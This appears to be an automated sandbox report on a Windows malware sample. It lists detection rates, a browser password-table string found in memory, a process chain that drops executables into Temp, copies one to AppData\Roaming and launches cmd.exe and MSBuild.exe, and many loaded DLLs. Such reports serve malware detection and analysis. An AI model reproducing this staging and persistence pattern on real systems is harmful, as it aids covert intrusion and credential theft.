Source: u48o.0.exe, 0000000A.00000003.1360080869.00000000246F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: zLwT7vCojz.exe	ReversingLabs: Detection: 39%
Source: zLwT7vCojz.exe	Virustotal: Detection: 40%

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

File read: C:\Users\user\Desktop\zLwT7vCojz.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\zLwT7vCojz.exe "C:\Users\user\Desktop\zLwT7vCojz.exe"
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Process created: C:\Users\user\AppData\Local\Temp\u48o.0.exe "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe"
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Process created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user~1\AppData\Local\Temp\Qg_Appv5.exe"
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Process created: C:\Users\user\AppData\Local\Temp\u48o.1.exe "C:\Users\user~1\AppData\Local\Temp\u48o.1.exe"
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 1476
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Process created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe C:\Users\user~1\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Process created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user~1\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 2020
Source: unknown	Process created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe "C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe"
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Process created: C:\Users\user\AppData\Local\Temp\u48o.0.exe "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Process created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user~1\AppData\Local\Temp\Qg_Appv5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Process created: C:\Users\user\AppData\Local\Temp\u48o.1.exe "C:\Users\user~1\AppData\Local\Temp\u48o.1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Process created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe C:\Users\user~1\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user~1\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Process created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: schedcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: version.dll	Jump to behavior
